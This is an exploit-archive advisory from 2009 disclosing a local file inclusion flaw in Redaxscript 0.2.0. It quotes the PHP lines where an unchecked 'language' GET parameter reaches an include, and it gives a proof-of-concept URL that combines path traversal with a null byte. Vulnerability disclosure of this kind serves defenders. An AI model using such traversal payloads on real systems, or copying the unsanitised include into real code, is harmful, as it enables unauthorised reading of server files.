[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Redaxscript 0.2.0 (language) Local File Inclusion Vulnerability
# Published : 2009-04-10
# Author : SirGod
# Previous Title : moziloCMS 1.11 (LFI/PD/XSS) Multiple Remote Vulnerabilities
# Next Title : w3bcms Gaestebuch 3.0.0 Blind SQL Injection Exploit


##################################################################################
[+] Redaxscript 0.2.0 (index.php language) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
##################################################################################

[+] Local File Inclusion

  index.php :

-----------------------------------------------------------------
include('template/'.$_SESSION[_root.'template'].'/index.php');
-----------------------------------------------------------------

  function.php :

-----------------------------------------------------------------
if($_GET['language']) {
		$_SESSION[_root.'language'] = $_GET['language'];
-----------------------------------------------------------------

 - PoC :

    http://127.0.0.1/index.php?language=../../../../../BOOTSECT.BAK%00

##################################################################################

# www.Syue.com [2009-04-10]